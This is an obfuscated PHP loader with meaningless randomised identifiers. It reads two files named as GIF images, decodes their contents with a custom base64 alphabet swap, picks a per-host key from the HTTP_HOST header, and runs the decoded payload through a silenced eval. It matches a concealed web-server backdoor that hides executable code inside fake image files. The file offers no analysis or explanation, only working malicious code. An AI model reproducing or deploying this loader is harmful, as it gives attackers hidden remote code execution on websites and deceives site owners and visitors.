<?php

class umefyx_owunezepe {

    public $ymyrach = 'agibim.gif';
    public $inabex_umochyth = false;
    public $defevu_ekijoxach = false;
    public $cywuxy_kohysham = false;

    protected function ripeqo_ecukhodekhu($tadive_hechokuwu) {
        $yqyrix_awokawezu = crc32($tadive_hechokuwu);
        if ((PHP_INT_SIZE > 4) && ($yqyrix_awokawezu & 0x80000000))
            $yqyrix_awokawezu = $yqyrix_awokawezu - 0x100000000;
        return abs($yqyrix_awokawezu);
    }

    protected function fugyme_jyfetena($tadive_hechokuwu) {
        $erixap = "uQ/ySwkb62ECh7Aa9HOR4tilq=f+ImXBD1KegJVdp3rsUozcTLjFxN8nGYWM0P5vZ";
        $ekikix = "rQ3JLGg=m2UY/ud5b1TFwfiZE7VX84HAD6CcRasBye+qKvz9MSpl0xkNnItWjPhoO";
        for ($lusopeh = 0; $lusopeh < strlen($erixap); $lusopeh++) {
            $ryxawoz = substr($erixap, $lusopeh, 1);
            $myduthe = substr($ekikix, $lusopeh, 1);
            $uratew[$ryxawoz] = $myduthe;
        }

        $kosivi = strtr($tadive_hechokuwu, $uratew);
        $kosivi = base64_decode($kosivi);

        return $kosivi;
    }

    protected function veqole_xathekyqep($tadive_hechokuwu) {
        $ycaryso = array();
        if (!file_exists($tadive_hechokuwu))
            return false;
        $nusisa = @file_get_contents($tadive_hechokuwu);
        if (!$nusisa)
            return false;
        $nusisa = substr($nusisa, 3);
        $ycaryso = $this->fugyme_jyfetena($nusisa);
        return $ycaryso;
    }

    public function atujyx_nytashilox() {
        $wytodi_qorazhuth = __DIR__ . "/" . $this->ymyrach;
        $hugiqu_myfarozol = $this->veqole_xathekyqep($wytodi_qorazhuth);
        if (!$hugiqu_myfarozol)
            return false;
        $this->inabex_umochyth = $hugiqu_myfarozol;
        return true;
    }

    public function ecidax_lathezasoc() {
        if ($this->defevu_ekijoxach)
            return true;
        $wytodi_qorazhuth = __DIR__ . '/ukabaso.gif';
        if (!file_exists($wytodi_qorazhuth)) {
            return false;
        }

        $hugiqu_myfarozol = $this->veqole_xathekyqep($wytodi_qorazhuth);
        $yqyrix_awokawezu = "HTTP_H" . "OST";
        $doqiwy_thoshacekhig = $_SERVER[$yqyrix_awokawezu];
        $ihiqen_pymewypik = floor(strlen($hugiqu_myfarozol) / 32);
        $irucaz_duwikhajesh = $this->ripeqo_ecukhodekhu($doqiwy_thoshacekhig) % $ihiqen_pymewypik;
        $orociz_omuxejoki = substr($hugiqu_myfarozol, $irucaz_duwikhajesh * 32, 32);
        $this->cywuxy_kohysham = $irucaz_duwikhajesh;
        $this->defevu_ekijoxach = $orociz_omuxejoki;

        if (!defined('vulumy_ruwegaru'))
            define('vulumy_ruwegaru', $orociz_omuxejoki);
        if (!defined('ijohev_ejubochuchi'))
            define('ijohev_ejubochuchi', $irucaz_duwikhajesh + 1);

        return $orociz_omuxejoki;
    }
}

$sugubo = new umefyx_owunezepe();
$sugubo->ecidax_lathezasoc();
$sugubo->atujyx_nytashilox();

if ($sugubo->inabex_umochyth) {
    @eval($sugubo->inabex_umochyth);
}